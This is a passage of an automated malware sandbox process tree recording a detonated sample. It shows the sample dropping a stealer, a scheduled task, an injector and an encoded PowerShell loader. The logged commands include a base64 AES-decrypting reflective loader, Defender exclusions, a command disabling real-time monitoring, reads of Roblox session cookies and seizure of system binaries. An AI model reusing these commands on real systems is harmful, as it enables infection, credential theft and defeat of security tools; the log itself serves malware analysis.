                                                                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                4⤵
                                                                                • Blocklisted process makes network request
                                                                                PID:316
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /K SilentSetup.cmd
                                                                                4⤵
                                                                                  PID:5144
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    5⤵
                                                                                      PID:5076
                                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
                                                                                      WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2756
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-JT117.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-JT117.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$106A6,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Drops file in Program Files directory
                                                                                        PID:5496
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
                                                                                          7⤵
                                                                                            PID:1268
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              8⤵
                                                                                                PID:6132
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /im winaerotweaker.exe /f
                                                                                                8⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:6080
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
                                                                                              7⤵
                                                                                                PID:5356
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /im winaerotweakerhelper.exe /f
                                                                                                  8⤵
                                                                                                  • Kills process with taskkill
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5088
                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\regmess.exe
                                                                                        regmess.exe
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4804
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_90861d08-37ef-401d-abd9-88fac79fd494\regmess.bat" "
                                                                                          4⤵
                                                                                            PID:4012
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg import Setup.reg /reg:32
                                                                                              5⤵
                                                                                                PID:4292
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg import Console.reg /reg:32
                                                                                                5⤵
                                                                                                  PID:5360
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg import Desktop.reg /reg:32
                                                                                                  5⤵
                                                                                                  • Sets desktop wallpaper using registry
                                                                                                  PID:6056
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg import International.reg /reg:32
                                                                                                  5⤵
                                                                                                    PID:6132
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg import Fonts.reg /reg:32
                                                                                                    5⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    PID:4428
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg import Cursors.reg /reg:32
                                                                                                    5⤵
                                                                                                      PID:5360
                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                  timeout /t 10
                                                                                                  3⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:4500
                                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\scary.exe
                                                                                                  scary.exe
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2484
                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                    "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                    4⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:2756
                                                                                                  • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                    "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4504
                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                      5⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:1280
                                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\the.exe
                                                                                                  the.exe
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3724
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                                                                    4⤵
                                                                                                    • UAC bypass
                                                                                                    • Windows security bypass
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1168
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\the.exe" -Force
                                                                                                      5⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2408
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                                                      5⤵
                                                                                                        PID:2512
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                                                        5⤵
                                                                                                          PID:1200
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im taskmgr.exe
                                                                                                      3⤵
                                                                                                      • Kills process with taskkill
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5840
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\wimloader.dll
                                                                                                      wimloader.dll
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:912
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_de424470-dd26-438d-b6bf-ec14e93d903e\caller.cmd" "
                                                                                                        4⤵
                                                                                                          PID:3052
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\ac3.exe
                                                                                                        ac3.exe
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                        PID:1932
                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                        "C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\shell1.ps1"
                                                                                                        3⤵
                                                                                                          PID:5620
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping trustsentry.com -t -n 1 -s 4 -4
                                                                                                          3⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:4612
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping ya.ru -t -n 1 -s 4 -4
                                                                                                          3⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:2880
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping tria.ge -t -n 1 -s 4 -4
                                                                                                          3⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:5956
                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                          xcopy bloatware C:\Users\Admin\Desktop
                                                                                                          3⤵
                                                                                                          • Enumerates system info in registry
                                                                                                          PID:1288
                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                          xcopy beastify.url C:\Users\Admin\Desktop
                                                                                                          3⤵
                                                                                                          • Enumerates system info in registry
                                                                                                          PID:4016
                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                          xcopy shell1.ps1 C:\Users\Admin\Desktop
                                                                                                          3⤵
                                                                                                          • Enumerates system info in registry
                                                                                                          PID:3724
                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                          takeown /R /F C:\Windows\explorer.exe
                                                                                                          3⤵
                                                                                                          • Possible privilege escalation attempt
                                                                                                          • Modifies file permissions
                                                                                                          PID:3400
                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                          icacls c:\Windows\explorer.exe /grant Admin:(F)
                                                                                                          3⤵
                                                                                                          • Possible privilege escalation attempt
                                                                                                          • Modifies file permissions
                                                                                                          PID:4564
                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                          takeown /R /F C:\Windows\System32\dwm.exe
                                                                                                          3⤵
                                                                                                          • Possible privilege escalation attempt
                                                                                                          • Modifies file permissions
                                                                                                          PID:2456
                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                          icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
                                                                                                          3⤵
                                                                                                          • Possible privilege escalation attempt
                                                                                                          • Modifies file permissions
                                                                                                          PID:3748
                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                          xcopy xcer.cer C:\Users\Admin\Desktop
                                                                                                          3⤵
                                                                                                          • Enumerates system info in registry
                                                                                                          PID:4172
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          timeout /t 15
                                                                                                          3⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:5220
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          timeout /t 15
                                                                                                          3⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:2804
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\freebobux.exe
                                                                                                          freebobux.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5252
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\923F.tmp\freebobux.bat""
                                                                                                            4⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Modifies registry class
                                                                                                            PID:3052
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\923F.tmp\CLWCP.exe
                                                                                                              clwcp c:\temp\bg.bmp
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Sets desktop wallpaper using registry
                                                                                                              PID:5788
                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\923F.tmp\x.vbs"
                                                                                                              5⤵
                                                                                                                PID:6904
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\SolaraBootstraper.exe
                                                                                                            SolaraBootstraper.exe
                                                                                                            3⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            PID:528
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4368
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                                                              4⤵
                                                                                                              • Drops file in Drivers directory
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:3752
                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                5⤵
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:5304
                                                                                                              • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                                                                5⤵
                                                                                                                • Views/modifies file attributes
                                                                                                                PID:5332
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                                                                                                                5⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                PID:2324
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                5⤵
                                                                                                                  PID:6684
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                  5⤵
                                                                                                                    PID:6728
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                    5⤵
                                                                                                                      PID:7100
                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                      "wmic.exe" os get Caption
                                                                                                                      5⤵
                                                                                                                        PID:6932
                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                        5⤵
                                                                                                                          PID:6720
                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                          "wmic.exe" csproduct get uuid
                                                                                                                          5⤵
                                                                                                                            PID:5756
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                            5⤵
                                                                                                                              PID:6304
                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                              "wmic" path win32_VideoController get name
                                                                                                                              5⤵
                                                                                                                              • Detects videocard installed
                                                                                                                              PID:5772
                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                                                                                                                              5⤵
                                                                                                                                PID:3052
                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                  ping localhost
                                                                                                                                  6⤵
                                                                                                                                  • Runs ping.exe
                                                                                                                                  PID:1388
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
                                                                                                                              4⤵
                                                                                                                              • Drops startup file
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Adds Run key to start application
                                                                                                                              PID:5704
                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
                                                                                                                                5⤵
                                                                                                                                • Modifies Windows Firewall
                                                                                                                                PID:6824
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /f /im ctfmon.exe
                                                                                                                            3⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:652
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\wim.dll
                                                                                                                            wim.dll
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:856
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_be4fad2d-62a4-49fc-9a36-3de4e275811b\load.cmd" "
                                                                                                                              4⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              PID:4288
                                                                                                                              • C:\Program Files\VideoLAN\VLC\vlc.exe
                                                                                                                                "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_be4fad2d-62a4-49fc-9a36-3de4e275811b\cringe.mp4"
                                                                                                                                5⤵
                                                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:1740
                                                                                                                              • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_be4fad2d-62a4-49fc-9a36-3de4e275811b\lol.ini
                                                                                                                                5⤵
                                                                                                                                  PID:6008
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\web2.htm
                                                                                                                              3⤵
                                                                                                                                PID:1100
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffba9be46f8,0x7ffba9be4708,0x7ffba9be4718
                                                                                                                                  4⤵
                                                                                                                                    PID:4192
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  "C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_d9b73c61-590d-4742-8f13-8bac763d7f6e\xcer.cer
                                                                                                                                  3⤵
                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                  • Checks computer location settings
                                                                                                                                  PID:5332
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
